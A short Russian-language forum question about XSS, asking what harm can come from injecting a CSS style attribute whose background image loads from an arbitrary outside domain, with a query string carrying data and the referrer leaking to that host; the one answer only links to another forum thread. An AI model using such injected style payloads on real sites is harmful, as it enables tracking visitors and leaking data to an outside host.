XSS: можно ли подгрузить картинкой что-то опасное?

Что можно сделать, если получилось встроить?

style="background: url(http://любой домен/1.img)"

Еще можно передавать запросы style="background: url(http://любой домен/1.img?запрос)"

Рефлер сам сайт, при запросе, передает информацию вместе с заголовками.
  • Вопрос задан
  • 3190 просмотров
Пригласить эксперта
Ответы на вопрос 1
@DaNHell
Change the world
Полнее некуда
forum.antichat.ru/thread20140.html
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы